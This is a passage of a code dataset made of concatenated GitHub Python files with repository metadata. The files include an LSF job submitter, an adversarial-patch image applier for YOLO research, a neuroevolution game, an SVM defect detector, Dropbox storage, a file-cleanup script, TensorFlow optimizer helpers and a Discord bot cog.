argparse.ArgumentParser()\n parser.add_argument(\"jobscript\")\n args = parser.parse_args()\n\n # Parse the job properties\n job_properties = read_job_properties(args.jobscript)\n\n # By default, we use 1 thread.\n threads = job_properties.get(\"threads\", 1)\n\n # Get defualt mem, runtimes and output files from cluster.json\n mem = int(job_properties[\"cluster\"][\"mem\"])\n runtime = int(job_properties[\"cluster\"][\"runtime\"])\n stdout = job_properties[\"cluster\"][\"output\"]\n stderr = job_properties[\"cluster\"][\"error\"]\n jobname = job_properties[\"cluster\"][\"name\"]\n\n # If the rule has specified resources, replace with those\n mem = int(job_properties[\"resources\"].get(\"mem\", mem))\n runtime = int(job_properties[\"resources\"].get(\"runtime\", runtime))\n\n # Make log file directories\n os.makedirs(os.path.dirname(stdout), exist_ok=True)\n os.makedirs(os.path.dirname(stderr), exist_ok=True)\n\n # Let the user specify the queue.\n queue = job_properties[\"resources\"].get(\"queue\", None)\n\n # Otherwise, choose an appropriate queue based on required resources.\n if not queue:\n queue = get_queue(threads, mem, runtime)\n\n # If we fail to find a queue, exit with an error.\n if not queue:\n msg = \"No valid queue! job_properties:\\n\"\n js = json.dumps(job_properties, indent=4, sort_keys=True)\n sys.stderr.write(msg + js)\n sys.exit(1)\n\n # Submit the job to the queue.\n run_bsub(queue, threads, mem, runtime, args.jobscript, jobname, stdout, stderr)\n time.sleep(1)\n\ndef run_bsub(queue, threads, mem, runtime, script, jobname, stdout, stderr):\n cmd = \"bsub -J {j} -q {q} -n {t}\".format(j=jobname, q=queue, t=threads)\n if mem:\n cmd += ' -R \"select[mem>{m}] rusage[mem={m}] span[hosts=1]\" -M{m}'.format(m=mem) # \"resources\" : \"\\\"select[mem>2000] rusage[mem=2000] span[hosts=1]\\\"\",\n if runtime:\n cmd += \" -W {}\".format(runtime)\n if stdout:\n cmd += \" -o {}\".format(stdout)\n if stderr:\n cmd += \" -e {}\".format(stderr)\n cmd += \" {s}\".format(s=script)\n print(cmd)\n return os.system(cmd)\n\ndef get_queue(threads, mem, runtime):\n # All the Sanger farm queues.\n queues = [\"small\", \"normal\", \"long\", \"basement\", \"hugemem\", \"teramem\"]\n # Find valid queues for this job\"s requirements.\n retval = []\n # The other queues are all ok if we leave runtime=0.\n if threads == 24 and mem <= 256000 and runtime <= 30:\n retval.append(\"small\")\n if threads <= 24 and mem <= 256000 and runtime <= 60 * 12:\n retval.append(\"normal\")\n if threads <= 24 and mem <= 256000 and runtime <= 60 * 24 * 2:\n retval.append(\"long\")\n if threads <= 24 and mem <= 256000 and runtime <= 60 * 24 * 30:\n retval.append(\"basement\")\n if threads <= 24 and 196000 < mem < 727500 and runtime <= 60 * 24 * 15:\n retval.append(\"hugemem\")\n if threads <= 24 and 727500 < mem < 2.9e6 and runtime <= 60 * 24 * 15:\n retval.append(\"teramem\")\n # Make sure we have at least one valid queue.\n if not len(retval):\n return None\n\n # # Get the number of currently running jobs on each queue.\n # lines = check_output(\"bqueues\").split(b\"\\n\")[1:-1]\n # lines = [line.decode(\"utf-8\").split() for line in lines]\n # njobs = {x[0]: int(x[7]) for x in lines}\n # # Among valid queues, choose the one with fewest running jobs.\n # return min(retval, key=lambda j: njobs[j])\n\n # Return the first of the suitable queues\n return retval[0]\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"edm1/templates","sub_path":"snakemake_template/bsub.py","file_name":"bsub.py","file_ext":"py","file_size_in_byte":4718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"24864195405","text":"import PIL\nimport load_data\nfrom tqdm import tqdm\n\nfrom load_data import *\nimport gc\nimport matplotlib.pyplot as plt\nfrom torch import autograd\nimport torchvision\nfrom torchvision import transforms\nfrom tensorboardX import SummaryWriter\nimport subprocess\n\nimport patch_config\nimport sys\nimport time\n\nclass WaymoPatchApplier(object):\n\tdef __init__(self, mode):\n\t\tself.config = patch_config.patch_configs[mode]()\n\n\t\tself.darknet_model = Darknet(self.config.cfgfile)\n\t\tself.darknet_model.load_weights(self.config.weightfile)\n\t\tself.darknet_model = self.darknet_model.eval().cuda() # TODO: Why eval?\n\t\tself.patch_applier = PatchApplier().cuda()\n\t\tself.patch_transformer = PoseEstimationPatchTransformer().cuda()\n\n\t\tself.writer = self.init_tensorboard(mode)\n\n\tdef init_tensorboard(self, name=None):\n\t\tif name is not None:\n\t\t\ttime_str = time.strftime(\"%Y%m%d-%H%M%S\")\n\t\t\treturn SummaryWriter(f'runs/{time_str}_{name}')\n\t\telse:\n\t\t\treturn SummaryWriter()\n\n\tdef apply_patch_and_save(self):\n\t\timg_size = self.darknet_model.height\n\t\tbatch_size = self.config.batch_size\n\t\tmax_lab = 1\n\n\t\ttime_str = time.strftime(\"%Y%m%d-%H%M%S\")\n\t\tprint(f'batch_size: {batch_size}')\n\t\t# Generate stating point\n\t\t# adv_patch_cpu = self.generate_patch(\"gray\")\n\t\t# adv_patch_cpu = self.read_image(\"saved_patches/patch_image_waymo_2.png\")\n\t\tadv_patch_cpu = self.read_image(\"patches/class_detection.png\")\n\n\t\tadv_patch_cpu.requires_grad_(True)\n\n\t\ttrain_loader = torch.utils.data.DataLoader(InriaDataset(self.config.img_dir, self.config.lab_dir, max_lab, img_size),\n\t\t\t\t\t\t\t\t\t\t\t\t batch_size=batch_size,\n\t\t\t\t\t\t\t\t\t\t\t\t num_workers=1)\n\t\tself.number_of_images = len(train_loader)\n\t\tfor i_batch, (img_batch, lab_batch) in tqdm(enumerate(train_loader), desc=f'Running Loading',\n\t\t\t\t\t\t\t\t\t\t\t\t\ttotal=self.number_of_images):\n\t\t\timg_batch = img_batch.cuda()\n\t\t\tlab_batch = lab_batch.cuda()\n\t\t\tadv_patch = adv_patch_cpu.cuda()\n\t\t\tadv_batch_t = self.patch_transformer(adv_patch, lab_batch, img_size, do_rotate=True, rand_loc=False)\n\t\t\tp_img_batch = self.patch_applier(img_batch, adv_batch_t)\n\t\t\t# self.writer.add_image('test_img'+str(i_batch), p_img_batch[0])\n\t\t\t\n\t\t\tprint(f'writing image {i_batch}')\n\t\t\timage_name = self.config.dir_to_store+'og/'+str(i_batch)+'_og_img.jpg'\n\t\t\tadv_image_name = self.config.dir_to_store+'patched/'+str(i_batch)+'_patched_img.jpg'\n\n\t\t\t# og_img_tensor = self.resize_img(p_img_batch[0], 1280, 1920)\n\t\t\t# adv_img_tensor = self.resize_img(img_batch[0], 1280, 1920)\n\t\t\tself.writer.add_image('test_img'+str(i_batch), p_img_batch[0])\n\n\t\t\ttorchvision.utils.save_image(p_img_batch[0], adv_image_name)\n\t\t\ttorchvision.utils.save_image(img_batch[0], image_name)\n\n\tdef generate_patch(self, type):\n\t\t\"\"\"\n\t\tGenerate a random patch as a starting point for optimization.\n\n\t\t:param type: Can be 'gray' or 'random'. Whether or not generate a gray or a random patch.\n\t\t:return:\n\t\t\"\"\"\n\t\tprint(f'patch size: {self.config.patch_size}')\n\t\tif type == 'gray':\n\t\t\tadv_patch_cpu = torch.full((3, self.config.patch_size, self.config.patch_size), 0.5)\n\t\telif type == 'random':\n\t\t\tadv_patch_cpu = torch.rand((3, self.config.patch_size, self.config.patch_size))\n\n\t\treturn adv_patch_cpu\n\n\tdef read_image(self, path):\n\t\t\"\"\"\n\t\tRead an input image to be used as a patch\n\n\t\t:param path: Path to the image to be read.\n\t\t:return: Returns the transformed patch as a pytorch Tensor.\n\t\t\"\"\"\n\t\tpatch_img = Image.open(path).convert('RGB')\n\t\ttf = transforms.Resize((self.config.patch_size, self.config.patch_size))\n\t\tpatch_img = tf(patch_img)\n\t\ttf = transforms.ToTensor()\n\t\tadv_patch_cpu = tf(patch_img)\n\t\treturn adv_patch_cpu\n\t\n\tdef resize_img(self, img_tensor, width, length):\n\t\ttf = transforms.Resize((length, width))\n\t\timg_tensor = tf(img_tensor)\n\t\treturn img_tensor\n\n\ndef main():\n\tif len(sys.argv) != 2:\n\t\tprint('You need to supply (only) a configuration mode.')\n\t\tprint('Possible modes are:')\n\t\tprint(patch_config.patch_configs)\n\n\twaymo_patch_applier = WaymoPatchApplier(sys.argv[1])\n\twaymo_patch_applier.apply_patch_and_save()\n\nif __name__ == '__main__':\n\tmain()\n\n\n","repo_name":"rishabhranawat/adv-patches-transferability","sub_path":"adv-yolo-patches/waymo_patch_apply.py","file_name":"waymo_patch_apply.py","file_ext":"py","file_size_in_byte":4011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"3985814205","text":"import random\r\nimport numpy as np \r\n\r\nclass Synapses: #these are the neural network's weights which are to be evolved\r\n def __init__(self, input_dimension, output_dimension):\r\n self.weights = 2 * np.random.random((input_dimension, output_dimension)) - 1 \r\n \r\n def sigmoid(self, x):\r\n return 1/(1+np.exp(-x))\r\n\r\n def f(self, values):\r\n return self.sigmoid(np.dot(values, self.weights)) \r\n\r\n\r\nclass Organism: #neural network\r\n def __init__(self, topology, probability = .1):\r\n self.p = probability\r\n self.fitness = 0\r\n [self.input_dimension, self.hidden_dimension, self.output_dimension] = topology\r\n self.l0 = Synapses(self.input_dimension, self.hidden_dimension)\r\n self.l1 = Synapses(self.hidden_dimension, self.output_dimension)\r\n \r\n def mutate(self):\r\n if random.random() <= self.p:\r\n for i in range(len(self.l0.weights) - 1):\r\n if random.random() <= self.p:\r\n self.l0.weights[i] = 2*random.random() - 1.\r\n for i in range(len(self.l1.weights) - 1):\r\n if random.random() <= self.p:\r\n self.l1.weights[i] = 2*random.random() - 1.\r\n\r\n def think(self, data_in):\r\n data = np.array(data_in)\r\n data_out = self.l1.f( self.l0.f(data))\r\n return int(data_out[0]) + int(data_out[1]) * 7\r\n\r\n def save(self, file_name = 'evolved_nn.npy'):\r\n np.save(file_name, {'l0_weights':self.l0.weights, 'l1_weights':self.l1.weights}) \r\n\r\n def load(self, file_name = 'evolved_nn.npy'):\r\n config = np.load(file_name).item()\r\n self.l0.weights = config['l0_weights']\r\n self.l1.weights = config['l1_weights']\r\n\r\nclass GA: # genetic algorithm \r\n def __init__(self):\r\n self.generation = 0\r\n\r\n def run(self, topology = [1,3,1], pop_size = 50, iterations = 100, elitism = .2, option = 0, mutation = .2):\r\n self.pop_size = pop_size\r\n self.iterations = iterations\r\n self.elitism = elitism\r\n self.organisms = [Organism(topology = topology, probability = mutation) for _ in range(self.pop_size)]\r\n self.fittest = random.choice(self.organisms) \r\n for _ in range(self.iterations):\r\n self.tournament(option)\r\n self.display_stats()\r\n self.evolve()\r\n self.fittest.save()\r\n\r\n def tournament(self, option):\r\n for organism in self.organisms:\r\n organism.fitness = 0\r\n if option == 0: #each plays against a random moving bot\r\n for organism in self.organisms:\r\n winner, loser = self.compete(organism, organism)\r\n organism = loser\r\n elif option == 1: #quicker - everyone paired off\r\n for i,j in zip(range(0,self.pop_size,2), range(1,self.pop_size,2)):\r\n winner, loser = self.compete(self.organisms[i], self.organisms[j] )\r\n self.organisms[i] = winner\r\n self.organisms[j] = loser\r\n elif option == 2: #thorough - everyone faces each other once\r\n for i in range(self.pop_size):\r\n for j in range(i, self.pop_size): \r\n winner, loser = self.compete(self.organisms[i], self.organisms[j] )\r\n self.organisms[i] = winner\r\n self.organisms[j] = loser\r\n \r\n def evolve(self):\r\n elite = sorted(self.organisms, key=lambda x: x.fitness, reverse = True)[:int(self.elitism * self.pop_size)]\r\n rest = self.reproduce(elite)\r\n self.organisms = elite + rest\r\n\r\n def compete(self, player1, player2):\r\n winner, loser = Game(player1, player2).play()\r\n winner.fitness += 1\r\n loser.fitness -= 1 \r\n return winner, loser\r\n \r\n def display_stats(self):\r\n for organism in self.organisms:\r\n if organism.fitness > self.fittest.fitness:\r\n self.fittest = organism\r\n self.generation += 1\r\n print('> GEN:',self.generation,'BEST:',self.fittest.fitness)\r\n\r\n def reproduce(self, elite):\r\n new_organisms = []\r\n elite_size = int(self.elitism * self.pop_size)\r\n leftover = self.pop_size - elite_size \r\n for i in range(0,leftover,2):\r\n a = b = 0\r\n while a == b: a, b = random.randint(0, elite_size - 1), random.randint(0, elite_size - 1)\r\n child1, child2 = self.crossover(elite[a], elite[b])\r\n child1.mutate()\r\n child2.mutate()\r\n new_organisms.append(child1)\r\n new_organisms.append(child2)\r\n return new_organisms\r\n\r\n def crossover(self, parent1, parent2):\r\n topology = [parent1.input_dimension, parent1.hidden_dimension, parent1.output_dimension]\r\n child1, child2 = Organism(topology = topology, probability = parent1.p), Organism(topology = topology, probability = parent1.p)\r\n child1.l0.weights, child1.l1.weights = parent1.l0.weights, parent2.l1.weights \r\n child2.l0.weights, child2.l1.weights = parent2.l0.weights, parent1.l1.weights\r\n return child1, child2\r\n\r\nclass Human: #to play a game against evolved A.I.\r\n def think(self, _):\r\n return (int(input('> row: ')) + int(input('> column: ')) * 7)\r\n\r\nclass Game: #game \"isolation\" used as the fitness function for the genetic algorithm\r\n directions = [(-2, -1), (-2, 1), (-1, -2), (-1, 2), (1, -2), (1, 2), (2, -1), (2, 1)] #variant: players moves like a chess knight\r\n\r\n def __init__(self, player1, player2, board_dimensions = [7,7]):\r\n [self.width, self.height] = board_dimensions\r\n self.turn = 0\r\n self._active_player = player1\r\n self._inactive_player = player2\r\n self.board_state = [0] * self.width * self.height #the 2D board represented as a 1D array [0000...] \r\n self.p1_location = -1 # -1 indicates not on board yet\r\n self.p2_location = -1\r\n\r\n def legal_move(self, coordinate):\r\n embedded = coordinate[0] + coordinate[1] * self.height #2D x,y --> 1D\r\n return (0 <= coordinate[0] < self.height and 0 <= coordinate[1] < self.width and self.board_state[embedded] == 0) #legal IF within board width, height & position is not occupeied (0)\r\n\r\n def possible_moves(self):\r\n if self.my_location() == -1: #not moved yet - player can be placed anywhere on board thats empty to begin with\r\n return [(i, j) for j in range(self.width) for i in range(self.height) if self.board_state[i + j * self.height] == 0]\r\n (r, c) = self.xy(self.my_location())\r\n valid_moves = [(r + dr, c + dc) for dr, dc in self.directions if self.legal_move((r + dr, c + dc))]\r\n random.shuffle(valid_moves)\r\n return valid_moves\r\n\r\n def apply_move(self, coordinate): #1D embedded coord \r\n self.board_state[coordinate] = 1\r\n if self.turn % 2 == 0: \r\n self.p1_location = coordinate\r\n else:\r\n self.p2_location = coordinate\r\n\r\n def my_location(self):\r\n if self.turn % 2 == 0: #even turn means its player1's turn\r\n return self.p1_location\r\n return self.p2_location\r\n\r\n def xy(self, embedded): #1D embedded coordinate --> 2D x,y coordinate\r\n return (embedded % self.height, embedded // self.height)\r\n\r\n def play(self, history = False): \r\n while True: \r\n choice = self._active_player.think(self.board_state + [self.my_location()]) #neural network provides guess for next best move (x,y) \r\n\r\n if self.turn %2 == 0:\r\n coord = random.choice(self.possible_moves())\r\n coord = coord[0] + coord[1] * self.height\r\n\r\n if self.xy(coord) not in self.possible_moves(): #illegal move - you lose! \r\n return self._inactive_player, self._active_player #return winning player (the other guy) & losing player\r\n \r\n self.apply_move(coord)\r\n \r\n if history: \r\n print(self.turn, self.xy(coord))\r\n print( self.display())\r\n\r\n self._active_player, self._inactive_player = self._inactive_player, self._active_player #switch players\r\n self.turn += 1\r\n \r\n def display(self, symbols=['x', 'o']):\r\n col_margin = len(str(self.height - 1)) + 1\r\n prefix = \"{:<\" + \"{}\".format(col_margin) + \"}\"\r\n offset = \" \" * (col_margin + 3)\r\n out = offset + ' '.join(map(str, range(self.width))) + '\\n\\r'\r\n for i in range(self.height):\r\n out += prefix.format(i) + ' | '\r\n for j in range(self.width):\r\n idx = i + j * self.height\r\n if not self.board_state[idx]:\r\n out += ' '\r\n elif self.p1_location == idx:\r\n out += symbols[0]\r\n elif self.p2_location == idx:\r\n out += symbols[1]\r\n else:\r\n out += '-'\r\n out += ' | '\r\n out += '\\n\\r'\r\n return out\r\n\r\nGA().run(iterations = 1000, topology = [50, 100, 2], option = 0, mutation = .4)\r\nplayer1 = Organism([50,100,2])\r\nplayer1.load()\r\nplayer2 = Human()\r\nGame(player2, player1).play(history = True)","repo_name":"mohammedterry/alphaIsolation","sub_path":"neuroevo.py","file_name":"neuroevo.py","file_ext":"py","file_size_in_byte":9215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"20153179729","text":"import os\nimport cv2\nimport numpy as np\nfrom sklearn.svm import OneClassSVM\nfrom skimage.io import imread\nfrom skimage.filters import prewitt\nimport matplotlib.pyplot as plt\nfrom skimage import measure\n\n\ndef load_images(directory):\n image_size = (256, 256)\n images = []\n for filename in os.listdir(directory):\n if filename.endswith('.jpg') or filename.endswith('.png') or filename.endswith('.jpeg'):\n img = imread(os.path.join(directory, filename), as_gray=True) # Convert to grayscale\n resized = cv2.resize(img, image_size, interpolation=cv2.INTER_AREA)\n images.append(resized)\n return images\n\ndef extract_features(images):\n features = []\n for img in images:\n # Extracting Edge Features\n edges_prewitt = prewitt(img)\n features.append(edges_prewitt)\n return features\n\ndef train_one_class_classifier(features):\n clf = OneClassSVM(gamma='auto', nu=0.01)\n features_reshaped = np.array(features).reshape(len(features), -1)\n clf.fit(features_reshaped)\n return clf\n\n\ndef detect_defects(image, clf):\n # Extract features from the test image\n test_feature = prewitt(image) \n \n\n # plt.imshow(test_feature, cmap='gray')\n\n # Reshape the feature to match the shape of training features\n test_feature_reshaped = test_feature.reshape(1, -1)\n\n # Predict the anomaly score for the test image\n anomaly_score = clf.decision_function(test_feature_reshaped)[0]\n\n print(f\"Anomaly Score: {anomaly_score}\")\n\n # Set a threshold to determine if the image is defective or not\n if anomaly_score < 0.002:\n return \"flawless\"\n elif anomaly_score > 0.002 and anomaly_score < 0.004:\n return \"good\"\n elif anomaly_score > 0.004 and anomaly_score < 0.006:\n return \"average\"\n elif anomaly_score > 0.006 and anomaly_score < 0.008:\n return \"bad\"\n elif anomaly_score > 0.008:\n return \"critical\"\n\n\n# Set the paths to your dataset\ntrain_directory = './train'\ntest_directory = './test'\n\n# Load train dataset\ntrain_images = load_images(train_directory)\n\n# Extract features from the train images\ntrain_features = extract_features(train_images)\n\n# Train the one-class classifier\nclf = train_one_class_classifier(train_features)\n\n\n# Program run loop\nwhile True:\n print('Enter image id: (0, 1, 2, 3...) \\nEnter x to exit!')\n user_input = input()\n if user_input == 'x':\n break\n # Load test image\n image_id = int(user_input)\n image_path = os.path.join(test_directory, f'{image_id}.jpg')\n img = imread(image_path, as_gray=True) # Convert to grayscale\n test_image = cv2.resize(img, (256, 256), interpolation=cv2.INTER_AREA)\n\n # Print test image\n test_img = cv2.imread(image_path)\n \n # Detect defects\n result = detect_defects(test_image, clf)\n print(f\"Defect Degree: {result}\")\n cv2.imshow(f\"Defect Degree: {result}\",test_img)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n\n\n\n\n\n\n\n\n\n","repo_name":"ObjectOrientedMindset/defect_detection_oneClassSVM","sub_path":"OneClassSVM.py","file_name":"OneClassSVM.py","file_ext":"py","file_size_in_byte":2957,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"20330501685","text":"import abc\n\nimport dropbox\nfrom io import BytesIO\n\nimport attr\n\nfrom mwc.core.cfg import load_settings\n\nsettings = load_settings()\n\n\n@attr.s\nclass BaseStorage(abc.ABC):\n namespace: str = attr.ib()\n\n def get(\n self,\n filename: str,\n ) -> BytesIO:\n ...\n\n def save(\n self,\n filename: str,\n storage_object: BytesIO,\n ) -> None:\n ...\n\n\n@attr.s\nclass DropBoxStorage(BaseStorage):\n namespace: str = attr.ib()\n _client = dropbox.Dropbox(settings['DROPBOX_TOKEN'])\n\n def __attrs_post_init__(self):\n if not self._folder_exists(self.namespace):\n self._create_folder(self.namespace)\n\n def _folder_exists(self, namespace):\n expected_path = f'/{namespace.lower()}'\n matches = self._client.files_search_v2(namespace).matches\n folder_matches = [\n match for match in matches\n if isinstance(match.metadata.get_metadata(), dropbox.files.FolderMetadata) and\n match.metadata.get_metadata().path_lower == expected_path\n ]\n if not folder_matches:\n return False\n else:\n return True\n\n def _create_folder(self, namespace):\n return self._client.files_create_folder_v2(f'/{namespace}')\n\n def get(\n self,\n filename: str,\n ) -> BytesIO:\n _, content = self._client.files_download(f'/{self.namespace}/{filename}')\n return content\n\n def save(\n self,\n filename: str,\n content: BytesIO,\n ) -> None:\n destination = f'/{self.namespace}/{filename}'\n self._client.files_upload(content.read(), destination)\n\n\ndef get_storage(namespace):\n return DropBoxStorage(namespace)\n","repo_name":"Bgeninatti/MovieWordCloud","sub_path":"mwc/core/storage.py","file_name":"storage.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"10324656790","text":"#!/usr/bin/python\n#coding=utf-8\n\n# 过期文件清理工具\n# 用于清理超过一定时间的日志、临时文件\n# 作者: kevin.hongs@gmail.com\n# 修订: 2016/03/03\n\nimport os\nimport re\nimport sys\nimport time\nimport datetime\nfrom getopt import getopt\n\ndef hsClean(dn, tm, ep, op, nm, ne):\n \"\"\"\n 清理工具\n dn: 待清理的目录\n tm: 清除此时间前的文件\n ep: 删除空的目录\n op: 仅输出不删除\n nm: 文件名称正则\n ne: 排除 nm 匹配的文件\n \"\"\"\n\n fc = 0\n fe = 0\n for fi in os.listdir(dn):\n if fi == \".\" or fi == \"..\":\n continue\n\n fn = os.path.join(dn, fi)\n if os.path.islink(fn):\n continue\n if os.path.isfile(fn):\n st = os.stat(fn)\n\n if tm < st.st_mtime:\n continue\n if nm:\n if nm.match(fi):\n if ne:\n continue\n else:\n if not ne:\n continue\n\n print(time.strftime(\"%Y/%m/%d %H:%M:%S\", time.localtime(st.st_mtime)), fn)\n if not op:\n os.remove(fn)\n fe += 1\n else:\n ap = hsClean(fn, tm, ep, op, nm, ne)\n\n if not ap:\n continue\n if not ep:\n continue\n\n print(\"0000/00/00 00:00:00\" , fn)\n if not op:\n os.remove(fn)\n fe += 1\n fc += 1\n\n return fc == fe\n\ndef hsPtime(tm):\n \"\"\"\n 时间格式\n 1234567890\n 1w2d3h5m6s\n 2015/10/11\n 2015/10/11T10:20:30\n \"\"\"\n\n mt = re.compile(r\"^\\d+$\").match(tm)\n if mt:\n return int (tm)\n\n mt = re.compile(r\"^(\\d+w)?(\\d+d)?(\\d+h+)?(\\d+m)?(\\d+s)?$\").match(tm)\n if mt:\n tm = datetime.datetime.now()\n tg = mt.group(1)\n if tg:\n tm -= datetime.timedelta(weeks=int(tg[:-1]))\n tg = mt.group(2)\n if tg:\n tm -= datetime.timedelta( days=int(tg[:-1]))\n tg = mt.group(3)\n if tg:\n tm -= datetime.timedelta(hours=int(tg[:-1]))\n tg = mt.group(4)\n if tg:\n tm -= datetime.timedelta(minutes=int(tg[:-1]))\n tg = mt.group(5)\n if tg:\n tm -= datetime.timedelta(seconds=int(tg[:-1]))\n return time.mktime(tm.timetuple())\n\n if len(tm) <= 10:\n return time.mktime(time.strptime(tm, r\"%Y/%m/%d\"))\n else:\n return time.mktime(time.strptime(tm, r\"%Y/%m/%dT%H:%M:%S\"))\n\nif __name__ == \"__main__\":\n def cmd_help():\n print(\"Usage: strip.py DIR_NAME EXP_TIME\")\n print(\"EXP_TIME format:\")\n print(\" 2015/12/17T12:34:56 Before this time\")\n print(\" 1234567890 Before this timestamp\")\n print(\" 1w2d3h5m6s Before some weeks, days...\")\n print(\"Another options:\")\n print(\" -p --print Just print files\")\n print(\" -e --empty Remove empty dir\")\n print(\" -n --name REGEXP File name regexp\")\n print(\" -x --deny Exclude names\")\n print(\" -h --help Show this msg\")\n\n if len(sys.argv) < 3:\n cmd_help( )\n sys.exit(0)\n\n dn = sys.argv[1]\n tm = sys.argv[2]\n ep = False\n op = False\n nm = None\n ne = False\n\n if not dn:\n print(\"Argument 1 (folder name) required!\")\n cmd_help( )\n sys.exit(1)\n if not tm:\n print(\"Argument 2 (expire time) required!\")\n cmd_help( )\n sys.exit(1)\n\n opts, args = getopt(sys.argv[3:], \"pen:xh\", [\"print\", \"empty\", \"name=\", \"deny\", \"help\"])\n for n,v in opts:\n if n in (\"-p\", \"--print\"):\n op = True\n if n in (\"-p\", \"--empty\"):\n ep = True\n if n in (\"-n\", \"--name\"):\n nm = v\n if n in (\"-d\", \"--deny\"):\n de = True\n if n in (\"-h\", \"--help\"):\n cmd_help( )\n sys.exit(0)\n\n tm = hsPtime( tm )\n dn = os.path.abspath(dn)\n if nm:\n nm = re.compile(nm)\n\n print(\"Delete files before \" + time.strftime(r\"%Y/%m/%d %H:%M:%S\", time.localtime(tm)) + \" in \" + dn)\n\n hsClean(dn, tm, ep, op, nm, ne)\n","repo_name":"ihongs/HongsCORE","sub_path":"hongs-web/web/WEB-INF/bin/strip.py","file_name":"strip.py","file_ext":"py","file_size_in_byte":4228,"program_lang":"python","lang":"en","doc_type":"code","stars":60,"dataset":"github-code","pt":"40"} +{"seq_id":"36404728559","text":"from django.shortcuts import render\n\n\n# Create your views here.\nfrom shop_about_us.models import AboutUs, OurTeam\n\n\ndef about_us(request):\n abouts_us = AboutUs.objects.all()\n our_team = OurTeam.objects.all()\n context = {\n \"about_us\": abouts_us,\n \"our_team\": our_team\n }\n return render(request, \"about_us/about_us.html\", context)\n","repo_name":"Alibehzad79/OnlineShop_with_Django","sub_path":"shop_about_us/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"40"} +{"seq_id":"71856076920","text":"# -*-coding:utf-8 -*-\n\"\"\"\n 常用Train OP 组合\n\"\"\"\nimport tensorflow.compat.v1 as tf\nfrom itertools import chain\n\ndef lr_decay(init_lr, step_per_epoch, decay_rate):\n global_step = tf.train.get_or_create_global_step()\n\n lr = tf.train.exponential_decay(\n init_lr,\n global_step,\n step_per_epoch,\n staircase=True,\n decay_rate=decay_rate)\n\n tf.summary.scalar('lr', lr)\n return lr\n\n\ndef gradient_clipping(optimizer, cost, lower_clip, upper_clip):\n \"\"\"\n apply gradient clipping\n \"\"\"\n gradients, variables = zip(*optimizer.compute_gradients( cost ))\n\n clip_grad = [tf.clip_by_value( grad, lower_clip, upper_clip) for grad in gradients if grad is not None]\n\n train_op = optimizer.apply_gradients(zip(clip_grad, variables),\n global_step=tf.train.get_global_step() )\n\n return train_op\n\n\ndef train_op_clip_decay(loss, init_lr, steps_per_epoch, decay_rate, lower_clip, upper_clip):\n \"\"\"\n Adam optimizer with exponential lr decay and gradient clip\n \"\"\"\n lr = lr_decay(init_lr, steps_per_epoch, decay_rate)\n\n opt = tf.train.AdamOptimizer(lr)\n\n train_op = gradient_clipping(opt, loss, lower_clip, upper_clip)\n\n return train_op\n\n\ndef train_op_diff_lr(loss, init_lr, diff_lr_times, optimizer, tvars=None):\n \"\"\"\n For finetune, use different learning rate schema for different layer\n diff_lr_times: {'scope': times}\n \"\"\"\n\n global_step = tf.train.get_or_create_global_step()\n\n if not tvars:\n tvars = tf.trainable_variables()\n\n opt_list = []\n var_list = []\n # lr/opt for other layers\n for name, times in diff_lr_times.items():\n opt = optimizer(init_lr * times)\n opt_list.append(opt)\n var_list.append([i for i in tvars if name in i.name])\n\n # 如果有剩余没有被diff_lr_times覆盖的variable默认都走init lr\n vars = [i for i in tvars if i not in list(chain(*var_list))]\n if vars:\n opt = optimizer(init_lr)\n opt_list.append(opt)\n var_list.append(vars)\n\n # calculate gradient for all vars and clip gradient\n all_grads = tf.gradients(loss, list(chain(*var_list)))\n (all_grads, _) = tf.clip_by_global_norm(all_grads, clip_norm=1.0)\n\n # back propagate given different learning rate\n train_op_list = []\n for vars, opt in zip(var_list, opt_list):\n num_vars = len(vars)\n grads = all_grads[:num_vars]\n all_grads = all_grads[num_vars:]\n train_op = opt.apply_gradients(zip(grads, vars), global_step=global_step)\n train_op_list.append(train_op)\n train_op = tf.group(train_op_list, [global_step.assign(global_step + 1)])\n\n return train_op\n\n\n","repo_name":"DSXiangLi/SimpleClassification","sub_path":"tools/opt_utils.py","file_name":"opt_utils.py","file_ext":"py","file_size_in_byte":2696,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"40"} +{"seq_id":"3686099786","text":"import discord\nimport sys\nfrom discord.ext import commands\n\nfrom config import Bot\n\n\nasync def modup(ctx):\n return ctx.channel.permissions_for(ctx.message.author).manage_messages\n\n\nclass General:\n \"\"\"General Management Commands.\"\"\"\n\n def __init__(self, bot):\n self.bot = bot\n\n @staticmethod\n def is_owner(ctx):\n return ctx.message.author.id == Bot.OWNER_ID\n\n @commands.command(no_pm=True)\n async def info(self, ctx):\n \"\"\"Shows bot info\"\"\"\n embed_info = discord.Embed(\n color=0x1abc9c\n ).set_author(name=str(ctx.bot.user), icon_url=ctx.bot.user.avatar_url) \\\n .add_field(name=\"Creator\", value=Bot.OWNER_NAME) \\\n .add_field(name=\"Version\", value=Bot.VERSION) \\\n .add_field(name=\"Discord Library Version\", value=discord.__version__) \\\n .add_field(name=\"Libraries Used\", value=\"\\n\".join(sys.modules.keys()))\n await ctx.message.channel.send(embed=embed_info)\n\n @commands.command(no_pm=True)\n async def ping(self, ctx):\n \"\"\"Shows bot's latency\"\"\"\n await ctx.send(str(int(self.bot.latency*1000))+\"ms\")\n\n @commands.command(no_pm=True)\n @commands.has_permissions(manage_guild=True)\n async def purge(self, ctx, *, limit: int):\n \"\"\" Purge x messages not (including this command)\"\"\"\n if limit < 100:\n await ctx.message.channel.purge(limit=limit, before=ctx.message)\n\n @commands.command(no_pm=True)\n async def serverinfo(self, ctx):\n \"\"\"General info about the server.\"\"\"\n embed = discord.Embed()\n guild = ctx.message.guild\n embed.set_author(name=str(guild), icon_url=guild.icon_url)\n embed.add_field(name=\"Owner:\", value=str(guild.owner))\n embed.add_field(name=\"Created at:\", 